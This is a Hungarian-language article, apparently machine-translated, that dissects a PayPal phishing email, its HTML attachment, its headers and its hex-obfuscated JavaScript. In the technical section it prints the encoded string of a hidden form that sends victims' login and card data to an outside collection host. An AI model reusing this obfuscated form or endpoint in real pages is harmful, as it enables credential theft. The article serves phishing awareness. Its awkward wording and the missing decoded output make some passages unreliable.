Ne gondold, hogy csak a bankadatok fontosak: végül is, ha valaki átveszi a fiókbejelentkezés feletti ellenőrzést, akkor nem csak az adott fiókban szereplő információkat ismeri fel, hanem az esély, hogy ugyanazt a bejelentkezési információt különböző más fiókok. És ha kompromisszák az e-mail fiókját, akkor visszaállíthatja az összes többi jelszót.
Tehát az erős és változó jelszavak mellett mindig figyelni kell a hamis e-maileket, amelyek az igazi maszkolást jelentik. Miközben a legtöbb adathalász kísérlet amatőr, egyesek meglehetősen meggyőzőek, ezért fontos megérteni, hogyan ismerjék fel őket a felszíni szinten, és hogyan működnek a motorháztető alatt.
Kép: asirap
Megvizsgálva, mi a Plain Sight
Példánkban az e-mail, mint a legtöbb adathalász kísérlet, "értesíti" Önt a PayPal-fiókjában végzett tevékenységről, amely normális körülmények között riasztó lehet. Tehát a cselekvésre való felhívás a fiókod ellenőrzése / visszaállítása azzal, hogy csaknem minden olyan személyes adatot nyújt be, amelyet gondolhat. Ismét ez eléggé formális.
Bár biztosan vannak kivételek, bár minden adathalász és átveréses e-mailt piros zászlók töltenek közvetlenül az üzenetben. Még ha a szöveg is meggyőző, általában sok hibát találsz az üzenetek testében, amelyek azt jelzik, hogy az üzenet nem törvényes.
Az üzenet teste
- "Paypal" - A helyes eset a "PayPal" (tőke P). Láthatja, hogy mindkét változat az üzenetben szerepel. A vállalatok nagyon szándékosak a brandingjükkel, így kétséges, hogy valami ilyesmi áthaladna a korrigáló folyamaton.
- "Engedélyezze az ActiveX-t" - Hányszor láttál egy PayPal méretű, legális web alapú vállalkozást egy olyan tulajdonosi összetevővel, amely csak egyetlen böngészőn működik, különösen akkor, ha több böngészőt támogat? Persze, valahol ott van egy cég, de ez egy piros zászló.
- "Biztonságosan". - Figyeld meg, hogy ez a szó nem illeszkedik a margóhoz a bekezdés szövegének többi részével. Még akkor is, ha egy kicsit többet nyúlok ki az ablakhoz, nem tér el helyesen.
- "Paypal!" - A felkiáltójel előtt álló tér kellemetlennek tűnik. Csak egy újabb meglepetés, amelyről biztos vagyok benne, hogy nem lenne egy legitim e-mail.
- "PayPal - Számla frissítése Form.pdf.htm" - Miért kellene a Paypal csatolni egy "PDF-t", különösen akkor, ha csak egy oldalra mutató linket tudtak elhelyezni a webhelyükön? Továbbá, miért próbálják elrejteni a HTML-fájlt PDF formátumban? Ez a legnagyobb piros zászló.
Az üzenet fejléce
- A címről a következő cím: [email protected].
- A címzés hiányzik. Nem üresítettem ki, egyszerűen nem része a standard üzenet fejlécnek. Általában egy olyan cég, amely a nevedet személyre szabja az e-mailt.
A csatolmány
Amikor megnyitom a mellékletet, azonnal láthatod, hogy az elrendezés nem megfelelő, mert hiányzik a stílusadatok. Ismét miért küldi el a PayPal HTML formanyomtatványt, amikor csak egy linket adhatnak hozzá a webhelyükön?
Jegyzet: a Gmail beépített HTML csatolmánymegtekintőjét használtuk erre a célra, de javasolnánk, hogy ne nyissa meg a csalásokkal kapcsolatos mellékleteket. Soha. Valaha. Gyakran tartalmaznak olyan kizsákmányolókat, amelyek trojansokat telepítenek a számítógépére, hogy ellopják a fiókadatait.
Egy kicsit többet görgetve láthatjuk, hogy ez az űrlap nem csak a PayPal bejelentkezési adatait, hanem banki és hitelkártya adatait is megkérdezi. Néhány kép törött.
A technikai bontás
Bár egyértelműnek kell lennie, mivel látható, hogy ez egy adathalászati kísérlet, most megpróbáljuk lebontani az e-mail technikai összetételét és megnézni, mit találhatunk.
Információ a csatolótól
Az első dolog, hogy vessen egy pillantást a HTML forrása a csatolt űrlap, ami az adatokat benyújtja a hamis oldalon.
A forrás gyors megtekintésénél minden hivatkozás érvényesnek mutatkozik, amelyek a "paypal.com" vagy a "paypalobjects.com" kifejezésre utalnak, amelyek mindegyike legitim.
Az e-mail fejlécek adatai
Ezután megnézzük a nyers email üzenet fejléceket. A Gmail ezt az üzenet Eredeti menüpontján keresztül jeleníti meg.
Hol halad az adatok?
Tehát egyértelműen meghatároztuk, hogy ez egy adathalász e-mail, és összegyűjtött néhány információt arról, hogy honnan származik az üzenet, de mi van az adatok küldésével?
Ehhez először el kell menteni a HTM mellékletet az asztalunkon, és meg kell nyitni egy szövegszerkesztőben. Görgetés közben minden úgy tűnik, hogy rendben van, kivéve, ha egy gyanús kereső Javascript blokkhoz jutunk.
Ha bármikor látsz egy nagyszerű, véletlenszerû betûket és számokat tartalmazó Java-kódot, amely egy JavaScript blokkba ágyazódik, akkor általában valami gyanús. A kódot nézve az "x" változó erre a nagy karakterláncra van állítva, majd dekódolva az "y" változóra. Az "y" változó végeredményét a dokumentumba HTML formában írjuk.
Mivel a nagy karakterlánc a 0-9 számokból és az a-f betűkből áll, valószínűleg egy egyszerű ASCII-Hex átalakításon keresztül kódolják:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
Fordít:
Nem véletlen, hogy ez egy érvényes HTML formátumú címkévé alakul, amely az eredményeket nem a PayPal felé továbbítja, hanem a gazember számára.
Továbbá, ha megtekinti az űrlap HTML forrását, látni fogja, hogy ez a űrlapcímke nem látható, mert dinamikusan jelenik meg a Javascript segítségével. Ez egy okos módszer arra, hogy elrejtse, mit csinál a HTML, ha valaki egyszerűen megtekinti a létrehozott forrást (mint korábban tettük), szemben azzal, hogy a melléklet közvetlenül a szövegszerkesztőben nyílik meg.
A cinizmus jó védelem
Amikor online biztonságban kell maradnia, soha nem fáj a jó cinizmusnak.
Bár biztos vagyok benne, hogy a piros zászlók vannak a példapéldányban, a fent említettek olyan mutatók, amelyeket csak néhány perc után vizsgáltunk. Hipotetikusan, ha az e-mail felületi szintje 100% -os legitim ellentételezését utánozta, akkor a technikai elemzés még mindig felmutatná valódi természetét. Ezért importálható, hogy megvizsgálhassa mindazt, amit tudsz és nem láthatsz.
